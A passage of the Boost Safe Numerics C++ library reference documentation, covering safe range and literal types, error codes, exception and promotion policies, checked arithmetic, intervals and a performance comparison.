range can represent.\n59Safe Numerics\nAssociated Types\nPP Promotion Policy. A type which specifies the result type of an expression using safe types.\nEP Exception Policy. A type containing members which are called when a correct result cannot be returned\nTemplate Parameters\nParameter Requirements Description\nT std::is_integer<T> The underlying type. Currently only built-in integer types are supported\nMIN must be a non-negative\nliteralThe minimum non-negative integer value that this type may hold\nMAX must be a non-negative\nliteralThe maximum non-negative integer value that this type may hold\n MIN <= MAX must be a valid closed range\nPP PromotionPolicy<PP> Default value is boost::numeric::native\nEP Exception Policy<EP> Default value is boost::numeric::default_exception_policy\nModel of\nNumeric\nInteger\nValid Expressions\nImplements all expressions and only those expressions supported by the base type T. Note that all these expressions are\nconstexpr . The result type of such an expression will be another safe type. The actual type of the result of such an expression\nwill depend upon the specific promotion policy template parameter.\nWhen a binary operand is applied to two instances of A safe_signed_range<MIN, MAX, PP, EP> or\nsafe_unsigned_range<MIN, MAX, PP, EP> one of the following must be true:\n•The promotion policies of the two operands must be the same or one of them must be void\n•The exception policies of the two operands must be the same or one of them must be void\nIf either of the above is not true, a compile error will result.\nExample of use\n// Copyright (c) 2018 Robert Ramey\n//\n// Distributed under the Boost Software License, Version 1.0. (See\n60Safe Numerics\n// accompanying file LICENSE_1_0.txt or copy at\n// http://www.boost.org/LICENSE_1_0.txt)\n#include <exception >\n#include <iostream >\n#include <type_traits >\n#include <boost/safe_numerics /safe_integer .hpp>\n#include <boost/safe_numerics /safe_integer_range .hpp>\n#include <boost/safe_numerics /safe_integer_literal .hpp>\n#include <boost/safe_numerics /utility .hpp>\nusing namespace boost::safe_numerics ;\nint main(){\n safe_unsigned_range <7, 24> i;\n \n // since the range is included in [0,255], the underlying type of i\n // will be an unsigned char.\n try{\n i = 0; // throws out_of_range exception\n std::cout << \"fails to detect erroneous assignment\" << std::endl;\n }\n catch (std::exception & e){\n // should arrive here\n }\n try{\n i = 9; // ok - no exception expected\n }\n catch (std::exception & e){\n std::cout << \"erroneous error for legal assignment\" << std::endl;\n }\n try{\n i *= 9; // fails to compile because result can't fin in range\n std::cout << \"fails to out of range result\" << std::endl;\n }\n catch (std::exception & e){\n // should arrive here\n }\n try{\n i = -1; // throws out_of_range exception\n std::cout << \"fails to detect erroneous assignment\" << std::endl;\n }\n catch (std::exception & e){\n // should arrive here\n }\n std::uint8_t j = 4;\n auto k = i + j;\n // if either or both types are safe types, the result is a safe type\n // determined by promotion policy. In this instance\n // the range of i is [7, 24] and the range of j is [0,255].\n // so the type of k will be a safe type with a range of [7,279]\n static_assert (\n is_safe <decltype (k)>::value\n && std::numeric_limits <decltype (k)>::min() == 7\n && std::numeric_limits <decltype (k)>::max() == 279,\n \"k is a safe range of [7,279]\"\n );\n return 0;\n61Safe Numerics\n}\nHeader\n#include <boost/numeric/safe_numerics/safe_range.hpp>\n7.3. safe_signed_literal<Value, PP , EP> and\nsafe_unsigned_literal<Value, PP, EP>\nDescription\nA safe type which holds a literal value. This is required to be able to initialize other safe types in such a way that an exception\ncode is not generated. It is also useful when creating constexpr versions of safe types. It contains one immutable value known at\ncompile time and hence can be used in any constexpr expression.\nAssociated Types\nPP A type which specifies the result type of an expression using safe types.\nEP A type containing members which are called when a correct result cannot be returned\nTemplate Parameters\nParameter Type Requirements Description\nValue Integer value used to initialize the literal\nPP PromotionPolicy<PP> Optional promotion policy. Default value is void\nEP Exception Policy<EP> Optional exception policy. Default value is void\nModel of\nNumeric\nInteger\nInherited Valid Expressions\nsafe literal types are immutable. Hence they only inherit those valid expressions which don't change the value. This excludes\nassignment, increment, and decrement and all unary operators except unary -, + and ~ . Other than that, they can be used\nanywhere a Value type can be used. Note that the default promotion and exception policies are void. This is usually convenient\nsince when a safe literal is used in a binary operation, this will inherit the policies of the other type. On the other hand, this can be\ninconvenient when operands of a binary expression are both safe literals. This will fail to compile since there are no designated\npromotion and exception policies. The way to address this to assign specific policies as in this example.\ntemplate <typename T>\nusing compile_time_value = safe_signed_literal <T>;\nconstexpr compile_time_value <1000> x;\nconstexpr compile_time_value <0> y;\n62Safe Numerics\n// should compile and execute without problem\n \nstd::cout << x << '\\n';\n// all the following statements should fail to compile because there are \n// no promotion and exception policies specified.\nconstexpr safe<int> z = x / y;\nExample of use\n#include <boost/safe_numerics /safe_integer_literal .hp>\nconstexpr boost::safe_numerics ::safe_signed_literal <42> x;\nmake_safe_literal(n, PP, EP)\nThis is a macro which returns an instance of a safe literal type. This instance will hold the value n. The type of the value returned\nwill be the smallest safe type which can hold the value n.\nHeader\n#include <boost/safe_numerics/safe_integer_literal.hpp>\n7.4. exception\nDescription\nHere we describe the data types used to refer to exceptional conditions which might occur. Note that when we use the word\n\"exception\", we don't mean the C++ term which refers to a data type, but rather the colloquial sense of a anomaly, irregularity,\ndeviation, special case, isolated example, peculiarity, abnormality, oddity; misfit, aberration or out of the ordinary occurrence.\nThis concept of \"exception\" is more complex that one would think and hence is not manifested by a single simple type. A small\nnumber of types work together to implement this concept within the library.\nWe've leveraged on the std::error_code which is part of the standard library. We don't use all the facilities that it offers so it's not\nan exact match, but it's useful and works for our purposes.\nenum class safe_numerics_error\nThe following values are those which a numeric result might return. They resemble the standard error codes used by C++\nstandard exceptions. This resemblance is coincidental and they are wholly unrelated to any codes of similar names. The reason\nfor the resemblance is that the library started it's development using the standard library codes. But as development progressed\nit became clear that the original codes weren't sufficient so now they stand on their own. Here are a list of error codes. The\ndescription of what they mean is\nSymbol Description\nsuccess successful operation - no error returned\npositive_overflow_error A positive number is too large to be represented by the data type\nnegative_overflow_error The absolute value of a negative number is too large to be represented by the data type.\n63Safe Numerics\nSymbol Description\ndomain_error the result of an operation is outside the legal range of the result.\nrange_error an argument to a function or operator is outside the legal range - e.g. sqrt(-1).\nprecision_overflow_error precision was lost in the course of executing the operation.\nunderflow_error A number is too close to zero to be represented by the data type.\nuninitialized_value According to the C++ standard, the result may be defined by the application. e.g. 16 >> 10\nwill result the expected result of 0 on most machines.\nThe above listed codes can be transformed to a instance of type std::error_code with the function:\nstd::error_code make_error_code (safe_numerics_error e)\nThis object can be\nenum class safe_numerics_actions\nThe above error codes are classified into groups according to how such exceptions should be handled. The following table shows\nthe possible actions that an error could be mapped to.\nSymbol Description\nno_action successful operation - no action action required\nuninitialized_value report attempt to use an uninitialized value - not currently used\narithmetic_error report an arithmetic error\nimplementation_defined_behavior report an operation which the C++ standard permits but fails to specify\nundefined_behavior report an operation whose result is undefined by the C++ standard.\nTranslation of a safe_numerics_error into the corresponding safe_numerics_action can be accomplished with the\nfollowing function:\nconstexpr enum safe_numerics_actions\nmake_safe_numerics_action (const safe_numerics_error & e);\nSee Also\n•C++ Standard Library version The C++ standard error handling utilities.\n•Thinking Asynchronously in C++ Another essential reference on the design and usage of the error_code\nHeader\n#include <boost/safe_numerics/exception.hpp>\n64Safe Numerics\n7.5. exception_policy<AE, IDB, UB, UV>\nDescription\nCreate a valid exception policy from 4 function objects. This specifies the actions to be taken for different types of invalid results.\nNotation\nSymbol Description\ne instance of a the type safe_numerics_error\nmessage pointer to const char * error message\nTemplate Parameters\nParameterType Requirements Invoked when:\nAEFunction object callable with the expression\nAE()(e, message)The operation cannot produce valid arithmetic result such as\noverflows, divide by zero, etc.\nUBFunction object callable with the expression\nUB()(e, message)The result is undefined by the C++ standard\nIDBFunction object callable with the expression\nIDB()(e,The result depends upon implementation defined behavior according\nto the C++ standard\nUVFunction object callable with the expression\nUV()(e, message)A variable is not initialized\nModel of\nExceptionPolicy\nInherited Valid Expressions\nThis class implements all the valid operations from the type requirements ExceptionPolicy . Aside from these, there are no other\noperations implemented.\nFunction Objects\nIn order to create an exception policy, one needs some function objects. The library includes some appropriate examples of these:\nName Description\nignore_exception Ignore any runtime exception and just return - thus propagating the error. This is what would\nhappen with unsafe data types\nthrow_exception throw an exception of type std::system_error\n65Safe Numerics\nName Description\ntrap_exception Invoke a function which is undefined. Compilers will include this function if and only if there\nis a possibility of a runtime error. Conversely, This will create a compile time error if there\nis any possibility that the operation will fail at runtime. Use the action to guarantee that your\napplication will never produce an invalid result. Any operation invoke\nBut of course one is free to provide his own. Here is an example of a function object which would could be used exception\nconditions.\n// log an exception condition but continue processing as though nothing has happened\n// this would emulate the behavior of an unsafe type.\nstruct log_runtime_exception {\n log_runtime_exception () = default ;\n void operator () (\n const boost::safe_numerics ::safe_numerics_error & e,\n const char * message\n ){\n std::cout\n << \"Caught system_error with code \"\n << boost::safe_numerics ::literal_string (e)\n << \" and message \" << message << '\\n';\n }\n};\nPolicies Provided by the library\nThe above function object can be composed into an exception policy by this class. The library provides common policies all\nready to use. In the table below, the word \"loose\" is used to indicate that implementation defined and undefined behavior is not\nconsidered an exceptional condition, while \"strict\" means the opposite. The word \"exception\" means that a runtime exception will\nbe thrown. The word \"trap\" means that the mere possibility of an error condition will result in a compile time error.\nName Description\nloose_exception_policy Throws runtime exception on any arithmetic error. Undefined and implementation defined\nbehavior is permitted as long as it does not produce an arithmetic error.\nloose_trap_policy Invoke a compile time error in any case where it's possible to result in an arithmetic error.\nstrict_exception_policy Throws runtime exception on any arithmetic error. Any undefined or implementation defined\nbehavior also results in throwing an exception.\nstrict_trap_policy Invoke a compile time error in any case where it's possible to result in an arithmetic error,\nundefined behavior or implementation defined behavior\ndefault_exception_policy an alias for strict_exception_policy\nIf none of the above suit your needs, you're free to create your own. Here is one where use the logging function object defined\nabove as a component in a loose exception policy which logs any arithmetic errors and ignores any other types of errors.\n// logging policy\n// log arithmetic errors but ignore them and continue to execute\n66Safe Numerics\n// implementation defined and undefined behavior is just executed\n// without logging.\nusing logging_exception_policy = exception_policy <\n log_runtime_exception , // arithmetic error\n ignore_exception , // implementation defined behavior\n ignore_exception , // undefined behavior\n ignore_exception // uninitialized value\n>;\nHeader\n#include <boost/numeric/safe_numerics/exception_policies.hpp>\n7.6. Promotion Policies\nnative\nDescription\nThis type contains the functions to return a safe type corresponding to the C++ type resulting from a given arithmetic operation.\nUsage of this policy with safe types will produce the exact same arithmetic results that using normal unsafe integer types will.\nHence this policy is suitable as a drop-in replacement for these unsafe types. Its main function is to trap incorrect arithmetic\nresults when using C++ for integer arithmetic.\nModel of\nPromotionPolicy\nAs an example of how this works consider C++ rules from section 5 of the standard - \"usual arithmetic conversions\".\nvoid int f(int x, int y){\n auto z = x + y; // z will be of type \"int\"\n return z;\n}\nAccording to these rules, z will be of type int. Depending on the values of x and y, z may or may not contain the correct\narithmetic result of the operation x + y.\nusing safe_int = safe<int, native >;\nvoid int f(safe_int x, safe_int y){\n auto z = x + y; // z will be of type \"safe_int\"\n return z;\n}\nExample of use\nThe following example illustrates the native type being passed as a template parameter for the type safe<int> . This example\nis slightly contrived in that safe<int> has native as its default promotion parameter so explicitly using native is not\nnecessary.\n#include <cassert >\n#include <boost/safe_numerics /safe_integer .hpp> \n67Safe Numerics\n#include <boost /safe_numerics /native .hpp> \nint main(){\n using namespace boost ::numeric ;\n // use native promotion policy where C++ standard arithmetic \n // might lead to incorrect results\n using safe_int8 = safe<std::int8_t , native >;\n try{\n safe_int8 x = 127;\n safe_int8 y = 2;\n safe_int8 z;\n // rather than producing an invalid result an exception is thrown\n z = x + y;\n assert (false); // never arrive here\n }\n catch (std::exception & e){\n // which we can catch here\n std::cout << e.what() << std::endl;\n }\n // When result is an int, C++ promotion rules guarentee \n // that there will be no incorrect result.\n // In such cases, there is no runtime overhead from using safe types.\n safe_int8 x = 127;\n safe_int8 y = 2;\n safe<int, native > z; // z can now hold the result of the addition of any two 8 bit numbers\n z = x + y; // is guaranteed correct without any runtime overhead or exception.\n return 0;\n}\nNotes\nSee Chapter 5, Expressions, C++ Standard\nHeader\n#include <boost/numeric/safe_numerics/native.hpp>\nautomatic\nDescription\nThis type contains the meta-functions to return a type with sufficient capacity to hold the result of a given binary arithmetic\noperation.\nThe standard C/C++ procedure for executing arithmetic operations on operands of different types is:\n•Convert operands to some common type using a somewhat elaborate elaborate rules defined in the C++ standard.\n•Execute the operation.\n•If the result of the operation cannot fit in the common type of the operands, discard the high order bits.\nThe automatic promotion policy replaces the standard C/C++ procedure for the following one:\n•Convert operands to some common type using to the following rules.\n•For addition. If the operands are both unsigned the common type will be unsigned. Otherwise it will be signed.\n68Safe Numerics\n•For subtraction, the common type will be signed.\n•For left/right shift, the sign of the result will be the sign of the left operand.\n•For all other types of operants, if both operands are unsigned the common type will be unsigned. Otherwise, it will be signed.\n•Determine the smallest size of the signed or unsigned type which can be guaranteed hold the result.\n•If this size exceeds the maximum size supported by the compiler, use the maximum size supported by the compiler.\n•Execute the operation.\n•Convert each operand to the common type.\n•If the result cannot be contained in the result type as above, invoke an error procedure.\n•Otherwise, return the result in the common type\nThis type promotion policy is applicable only to safe types whose base type is an Integer type.\nModel of\nPromotionPolicy\nExample of use\nThe following example illustrates the automatic type being passed as a template parameter for the type safe<int> .\n#include <boost/safe_numerics /safe_integer .hpp> \n#include <boost/safe_numerics /automatic .hpp>\n \nint main(){\n using namespace boost ::numeric ;\n // use automatic promotion policy where C++ standard arithmetic \n // might lead to incorrect results\n using safe_t = safe<std::int8_t , automatic >;\n // In such cases, there is no runtime overhead from using safe types.\n safe_t x = 127;\n safe_t y = 2;\n // z is guaranteed correct without any runtime overhead or exception.\n auto z = x + y; \n return 0;\n}\nHeader\n#include <boost/safe_numerics/automatic.hpp>\ncpp<int C, int S, int I, int L, int LL>\nDescription\nThis policy is used to promote safe types in arithmetic expressions according to the rules in the C++ standard. But rather than\nusing the native C++ standard types supported by the compiler, it uses types whose length in number of bits is specified by the\ntemplate parameters.\n69Safe Numerics\nThis policy is useful for running test programs which use C++ portable integer types but which are destined to run on an\narchitecture which is different than the one on which the test program is being built and run. This can happen when developing\ncode for embedded systems. Algorithms developed or borrowed from one architecture but destined for another can be tested on\nthe desktop.\nNote that this policy is only applicable to safe types whose base type is a type fulfilling the type requirements of Integer.\nTemplate Parameters\nParameter Type Description\nC int Number of bits in a char\nS int Number of bits in a short\nI int Number of bits in an integer\nL int Number of bits in a long\nLL int Number of bits in a long long\nModel of\nPromotionPolicy\nExample of Use\nConsider the following problem. One is developing software which uses a very small microprocessor and a very limited C\ncompiler. The chip is so small, you can't print anything from the code, log, debug or anything else. One debugs this code by using\nthe \"burn\" and \"crash\" method - you burn the chip (download the code), run the code, observe the results, make changes and try\nagain. This is a crude method which is usually the one used. But it can be quite time consuming.\nConsider an alternative. Build and compile your code in testable modules. For each module write a test which exercises all the\ncode and makes it work. Finally download your code into the chip and - voilà - working product. This sounds great, but there's\none problem. Our target processor - in this case a PIC162550 from Microchip Technology is only an 8 bit CPU. The compiler\nwe use defines INT as 8 bits. This (and a few other problems), make our algorithm testing environment differ from our target\nenvironment. We can address this by defining INT as a safe integer with a range of 8 bits. By using a custom promotion policy,\nwe can force the evaluation of C++ expressions in the test environment to be the same as that in the target environment. Also\nin our target environment, we can trap any overflows or other errors. So we can write and test our code on our desktop system\nand download the code to the target knowing that it just has to work. This is a huge time saver and confidence builder. For an\nextended example on how this is done, look at Safety Critical Embedded Controller .\nHeader\n#include <boost/numeric/safe_numerics/cpp.hpp>\n8. Exception Safety\nAll operations in this library are exception safe and meet the strong guarantee.\n9. Library Implementation\nThis library should compile and run correctly on any conforming C++14 compiler.\n70Safe Numerics\nThe Safe Numerics library is implemented in terms of some more fundamental software components described here. It is not\nnecessary to know about these components to use the library. This information has been included to help those who want to\nunderstand how the library works so they can extend it, correct bugs in it, or understand its limitations. These components are also\ninteresting and likely useful in their own right. For all these reasons, they are documented here.\nIn general terms, the library works in the following manner:\nAt compile time:\n•The library defines \"safe\" versions of C++ primitive arithmetic types such as int, unsigned int , etc.\n•Arithmetic operators are defined for these \"safe\" types. These operators are enhanced versions of the standard C/C++\nimplementations. These operators are declared and implemented in the files \" safe_base.hpp \" and \"safe_base_operations.hpp \".\n•For binary operators, verify that both operands have the same promotion and and exception handling policies. If they don't,\ninvoke compilation error.\n•Invoke the promotion policy to determine the result type R of the operation.\n•For each operand of type T retrieve the range of values from std::numeric_limits<T>::min() and\nstd::numeric_limits<T>::max() . A range is a pair of values representing a closed interval with a minimum and\nmaximum value.\n•These ranges are cast to equivalent values of the result type, R. It's possible that values cannot be cast to the result type so the\nresult of the cast is returned as a variant type, checked_result<R> . checked_result<R> may hold either a value of type\nR or a safe_numerics_error value indicating why the cast could not be accomplished. Ranges are represented as a pair of\nvalues of the type checked_result<R> .\n•checked_result<R> can be considered enhanced versions of the underlying type R. Operations which are legal on values of\ntype R such as +, -, ... are also legal on values of checked_result<R> . The difference is that the latter can record operation\nfailures and propagate such failures to subsequent operations. checked_result<R> is implemented in the header file\n\"checked_result.hpp \". Operations on such types are implemented in \" checked_result_operations.hpp \".\n•Given the ranges of the operands, determine the range of the result of the operation using compile-time interval arithmetic.\nThe constexpr facility of C++14 permits the range of the result to be calculated at compile time. Interval arithmetic is\nimplemented in the header file \" interval.hpp \". The range of the result is also represented as a pair of values of the type\nchecked_result<R> .\n•Operations on primitives are implemented via free standing functions described as checked arithmetic . These operations will\nreturn instances of checked_result<R> .\nAt run time:\n•If the range of the result type includes only arithmetically valid values, the operation is guaranteed to produce an arithmetically\ncorrect result and no runtime checking is necessary. The operation invokes the original built-in C/C++ operation and returns the\nresult value.\n•Otherwise, operands are cast to the result type, R, according to the selected promotion policy. These \"checked\" cast operations\nreturn values of type checked_result<R> .\n•If either of the casting operations fails, an exception is handled in accordance with the exception policy.\n•Otherwise, the operation is performed using \" checked arithmetic \". These free functions mirror the normal operators +, -, *, ...\nexcept that rather than returning values of type R, they return values of the type checked_result<R> . They are defined in\nfiles \"checked_default.hpp \", \"checked_integer.hpp \" ,\"checked_float.hpp \".\n71Safe Numerics\n•If the operation is not successful, the designated exception policy function is invoked.\n•Otherwise, the result value is returned as a safe<R> type with the above calculated result range.\nThe following components realize the design described here.\n9.1. checked_result<R>\nDescription\nchecked_result is a special kind of variant class designed to hold the result of some operation. It can hold either the result of the\noperation or information on why the operation failed to produce a valid result. It is similar to other types proposed for and/or\nincluded to the C++ standard library or Boost such as expected , variant , optional and outcome . In some circumstances it\nmay be referred to as a \"monad\".\n•All instances of checked_result<R> are immutable. That is, once constructed, they cannot be altered.\n•There is no default constructor.\n•checked_result<R> is never empty.\n•Binary operations supported by type R are guaranteed to be supported by checked_result<R>.\n•Binary operations can be invoked on a pair of checked_result<R> instances if and only if the underlying type (R) is\nidentical for both instances. They will return a value of type checked_result<R> .\n•Unary operations can be invoked on checked_result<R> instances. They will return a value of type checked_result<R> .\n•Comparison operations will return a boost::logic::tribool . Other binary operations will a value of the same type as the\narguments.\nThink of checked<R> as an \"extended\" version of R which can hold all the values that R can hold in addition other \"special\nvalues\". For example, consider checked<int>.\nNotation\nSymbol Description\nR Underlying type\nr An instance of type R\nc, c1, c2 an instance of checked_result<R>\nt an instance of checked_result<T> for some type T not necessarily the same as R\ne An instance of type safe_numerics_error\nmsg An instance of type const char *\nOS A type convertible to std::basic_ostream\nos An instance of type convertible to std::basic_ostream\n72Safe Numerics\nTemplate Parameters\nR must model the type requirements of Numeric\nParameter Description\nR Underlying type\nModel of\nNumeric\nValid Expressions\nAll expressions are constexpr .\nExpression Return Type Semantics\nchecked_result(r) checked_result<R> constructor with valid instance of R\nchecked_result<R>(t) checked_result<R> constructor with checked_result<T> where T is not R. T\nmust be convertible to R.\nchecked_result(e, msg) checked_result<R> constructor with error information\nstatic_cast<R>(c) R extract wrapped value - compile time error if not possible\nstatic_cast< safe_numerics_error >(c)safe_numerics_error extract wrapped value - may return\nsafe_numerics_error ::success if there is no error\nstatic_cast<const char *>(c) const char * returns pointer to the included error message\nc.exception() bool true if checked_result contains an error condition.\nc1 < c2\nc1 >= c2\nc1 > c2\nc1 <= c2\nc1 == c2\nc1 != c2boost::logic::tribool compare the wrapped values of two checked_result instances.\nIf the values are such that the result of such a comparison\ncannot be reasonably defined, The result of the comparison is\nboost::logic::tribool::indeterminant .\nc1 + c2\nc1 - c2\nc1 * c2\nc1 / c2\nc1 % c2\nc1 | c2\nc1 & c2\nc1 ^ c2\nc1 << c2\nc1 >> c2checked_result<R> returns a new instance of checked_result<R>.\nos << c OS writes result to output stream. If the result is an error it writes\nthe string corresponding to the error message. Otherwise,\n73Safe Numerics\nExpression Return Type Semantics\nit writes the numeric value resulting from the operation.\nReturns reference to output stream.\nExample of use\n// Copyright (c) 2018 Robert Ramey\n//\n// Distributed under the Boost Software License, Version 1.0. (See\n// accompanying file LICENSE_1_0.txt or copy at\n// http://www.boost.org/LICENSE_1_0.txt)\n#include <iostream >\n#include <boost /safe_numerics /checked_result .hpp>\n#include <boost /safe_numerics /checked_result_operations .hpp>\nint main(){\n using ext_uint = boost ::safe_numerics ::checked_result <unsigned int>;\n const ext_uint x{4};\n const ext_uint y{3};\n // operation is a success!\n std::cout << \"success! x - y = \" << x - y;\n // subtraction would result in -1, and invalid result for an unsigned value\n std::cout << \"problem: y - x = \" << y - x;\n const ext_uint z = y - x;\n std::cout << \"z = \" << z;\n // sum of two negative overflows is a negative overflow.\n std::cout << \"z + z\" << z + z;\n return 0;\n}\nSee Also\nExceptionPolicy\nHeader\n#include <boost/numeric/safe_numerics/checked_result.hpp>\n#include <boost/numeric/safe_numerics/checked_result_operations.hpp>\n9.2. Checked Arithmetic\nDescription\nPerform binary operations on arithmetic types. Return either a valid result or an error code. Under no circumstances should an\nincorrect result be returned.\n74Safe Numerics\nType requirements\nAll template parameters of the functions must model Numeric type requirements.\nComplexity\nEach function performs one and only one arithmetic operation.\nExample of use\n#include <boost/numeric /safe_numerics /checked_default .hpp>\nchecked_result <int> r = checked ::multiply <int>(24, 42);\nNotes\nSome compilers have command line switches (e.g. -ftrapv) which enable special behavior such that erroneous integer operations\nare detected at run time. The library has been implemented in such a way that these facilities are not used. It's possible they might\nbe helpful in particular environment. These could be be exploited by re-implementing some functions in this library.\nSynopsis\n// safe casting on primitive types\ntemplate <class R, class T>\nchecked_result <R> constexpr checked ::cast(const T & t);\n// safe addition on primitive types\ntemplate <class R>\nchecked_result <R> constexpr checked ::add(const R & t, const R & u);\n// safe subtraction on primitive types\ntemplate <class R>\nchecked_result <R> constexpr checked ::subtract (const R & t, const R & u);\n// safe multiplication on primitive types\ntemplate <class R>\nchecked_result <R> constexpr checked ::multiply (const R & t, const R & u);\n// safe division on primitive types\ntemplate <class R>\nchecked_result <R> constexpr checked ::divide (const R & t, const R & u);\n// safe modulus on primitive types\ntemplate <class R>\nchecked_result <R> constexpr checked ::modulus (const R & t, const R & u);\n// safe less than predicate on primitive types\ntemplate <class R>\nbool constexpr checked ::less_than (const R & t, const R & u);\n// safe greater_than_equal predicate on primitive types\ntemplate <class R>\nbool constexpr checked ::greater_than_equal (const R & t, const R & u);\n// safe greater_than predicate on primitive types\n75Safe Numerics\ntemplate <class R>\nbool constexpr checked ::greater_than (const R & t, const R & u);\n// safe less_than_equal predicate on primitive types\ntemplate <class R>\nbool constexpr checked ::less_than_equal (const R & t, const R & u);\n// safe equal predicate on primitive types\ntemplate <class R>\nbool constexpr checked ::equal(const R & t, const R & u);\n// left shift\ntemplate <class R>\nchecked_result <R> constexpr checked ::left_shift (const R & t, const R & u);\n// right shift\ntemplate <class R>\nchecked_result <R> constexpr checked ::right_shift (const R & t, const R & u);\n// bitwise operations\ntemplate <class R>\nchecked_result <R> constexpr checked ::bitwise_or (const R & t, const R & u);\ntemplate <class R>\nchecked_result <R> constexpr checked ::bitwise_and (const R & t, const R & u);\ntemplate <class R>\nchecked_result <R> constexpr checked ::bitwise_xor (const R & t, const R & u);\nSee Also\nchecked_result<R>\nHeader\n#include <boost/numeric/safe_numerics/checked_default.hpp>\n#include <boost/numeric/safe_numerics/checked_integer.hpp>\n#include <boost/numeric/safe_numerics/checked_float.hpp>\n9.3. interval<R>\nDescription\nA closed arithmetic interval represented by a pair of elements of type R. In principle, one should be able to use Boost.Interval\nlibrary for this. But the functions in this library are not constexpr . Also, this Boost.Interval is more complex and does not\nsupport certain operations such bit operations. Perhaps some time in the future, Boost.Interval will be used instead of this\ninterval<R> type.\nTemplate Parameters\nR must model the type requirements of Numeric. Note this in principle includes any numeric type including floating point\nnumbers and instances of checked_result<R> .\n76Safe Numerics\nNotation\nSymbol Description\nI An interval type\ni, j An instance of interval type\nR Numeric types which can be used to make an interval\nr An instance of type R\np An instance of std::pair<R, R>\nl, u Lowermost and uppermost values in an interval\nos std::basic_ostream<class CharT, class Traits = std::char_traits<CharT>>\nAssociated Types\nchecked_result holds either the result of an operation or information as to why it failed\nValid Expressions\nNote that all expressions are constexpr.\nExpression Return Type Semantics\ninterval<R>(l, u) interval<R> construct a new interval from a pair of limits\ninterval<R>(p) interval<R> construct a new interval from a pair of limits\ninterval<R>(i) interval<R> copy constructor\nmake_interval<R>() interval<R> return new interval with std::numric_limits<R>::min() and\nstd::numric_limits<R>::max()\nmake_interval<R>(const\nR &r)interval<R> return new interval with std::numric_limits<R>::min() and\nstd::numric_limits<R>::max()\ni.l R lowermost value in the interval i\ni.u R uppermost value in the interval i\ni.includes(j) boost::logic::tribool return true if interval i includes interval j\ni.excludes(j) boost::logic::tribool return true if interval i includes interval j\ni.includes(t) bool return true if interval i includes value t\n77Safe Numerics\nExpression Return Type Semantics\ni.excludes(t) bool return true if interval i includes value t\ni + j interval<R> add two intervals and return the result\ni - j interval<R> subtract two intervals and return the result\ni * j interval<R> multiply two intervals and return the result\ni / j interval<R> divide one interval by another and return the result\ni % j interval<R> calculate modulus of one interval by another and return the result\ni << j interval<R> calculate the range that would result from shifting one interval by another\ni >> j interval<R> calculate the range that would result from shifting one interval by another\ni | j interval<R> range of values which can result from applying | to any pair of operands\nfrom I and j\ni & j interval<R> range of values which can result from applying & to any pair of operands\nfrom I and j\ni ^ j interval<R> range of values which can result from applying ^ to any pair of operands\nfrom I and j\nt < u boost::logic::tribool true if every element in t is less than every element in u\nt > u boost::logic::tribool true if every element in t is greater than every element in u\nt <= u boost::logic::tribool true if every element in t is less than or equal to every element in u\nt >= u boost::logic::tribool true if every element in t is greater than or equal to every element in u\nt == u bool true if limits are equal\nt != u bool true if limits are not equal\nos << i os & print interval to output stream\nExample of use\n#include <iostream >\n#include <cstdint >\n#include <cassert >\n#include <boost /numeric /safe_numerics /interval .hpp>\nint main(){\n std::cout << \"test1\" << std::endl;\n interval <std::int16_t > x = {-64, 63};\n std::cout << \"x = \" << x << std::endl;\n interval <std::int16_t > y(-128, 126);\n78Safe Numerics\n std::cout << \"y = \" << y << std::endl;\n assert (static_cast <interval <std::int16_t >>(add<std::int16_t >(x,x)) == y);\n std::cout << \"x + x =\" << add<std::int16_t >(x, x) << std::endl;\n std::cout << \"x - x = \" << subtract <std::int16_t >(x, x) << std::endl;\n return 0;\n}\nHeader\n#include <boost/numeric/safe_numerics/interval.hpp>\n9.4. safe_compare<T, U>\nSynopsis\n// compare any pair of integers\ntemplate <class T, class U>\nbool constexpr safe_compare ::less_than (const T & lhs, const U & rhs);\ntemplate <class T, class U>\nbool constexpr safe_compare ::greater_than (const T & lhs, const U & rhs);\ntemplate <class T, class U>\nbool constexpr safe_compare ::less_than_equal (const T & lhs, const U & rhs);\ntemplate <class T, class U>\nbool constexpr safe_compare ::greater_than_equal (const T & lhs, const U & rhs);\ntemplate <class T, class U>\nbool constexpr safe_compare ::equal(const T & lhs, const U & rhs);\ntemplate <class T, class U>\nbool constexpr safe_compare ::not_equal (const T & lhs, const U & rhs);\nDescription\nCompare two primitive integers. These functions will return a correct result regardless of the type of the operands. Specifically it\nis guaranteed to return the correct arithmetic result when comparing signed and unsigned types of any size. It does not follow the\nstandard C/C++ procedure of converting the operands to some common type then doing the compare. So it is not equivalent to the\nC/C++ binary operations <, >, >=, <=, ==, != and shouldn't be used by user programs which should be portable to standard C/C++\ninteger arithmetic. The functions are free functions defined inside the namespace boost::numeric::safe_compare .\nType requirements\nAll template parameters of the functions must be C/C++ built-in integer types, char, int ....\nComplexity\nEach function performs one and only one arithmetic operation.\nExample of use\n#include <cassert >\n#include <safe_compare .hpp>\n79Safe Numerics\nusing namespace boost::numeric ;\nconst short int x = -64;\nconst unsigned int y = 42000;\nassert (x < y); // fails\nassert (safe_compare ::less_than (x, y)); // OK\nHeader\n#include <boost/numeric/safe_numerics/safe_compare.hpp>\n10. Performance Tests\nOur goal is to create facilities which make it possible to write programs known to be correct. But we also want programmers to\nactually use the facilities we provide here. This won't happen if using these facilities impacts performance to a significant degree.\nAlthough we've taken precautions to avoid doing this, the only real way to know is to create and run some tests.\nSo far we've only run one explicit performance test - test_performance.cpp . This runs a test from the Boost Multiprecision\nlibrary to count prime numbers and makes extensive usage of integer arithmetic. We've run the tests with unsigned integers and\nwith safe<unsigned> on two different compilers.. No other change was made to the program. We list the results without further\ncomment.\ng++ (GCC) 6.2.0\nTesting type unsigned:\ntime = 17.6215\ncount = 1857858\nTesting type safe<unsigned>:\ntime = 22.4226\ncount = 1857858\nclang-802.0.41\nTesting type unsigned:\ntime = 16.9174\ncount = 1857858\nTesting type safe<unsigned>:\ntime = 36.5166\ncount = 1857858\n11. Rationale and FAQ\n11.1.Is this really necessary? If I'm writing the program with the requisite care and competence, problems noted in the\nintroduction will never arise. Should they arise, they should be fixed \"at the source\" and not with a \"band aid\" to cover up\nbad practice.\nThis surprised me when it was first raised. But some of the feedback I've received makes me think that it's a widely\nheld view. The best answer is to consider the examples in the Tutorials and Motivating Examples section of the library\ndocumentation. I believe they convincingly demonstrate that any program which does not use this library must be assumed\nto contain arithmetic errors.\n11.2.Can safe types be used as drop-in replacements for built-in types?\nAlmost. Replacing all built-in types with their safe counterparts should result in a program that will compile and run as\nexpected. Occasionally compile time errors will occur and adjustments to the source code will be required. Typically these\nwill result in code which is more correct.\n80Safe Numerics\n11.3.Why are there special types for literal such as 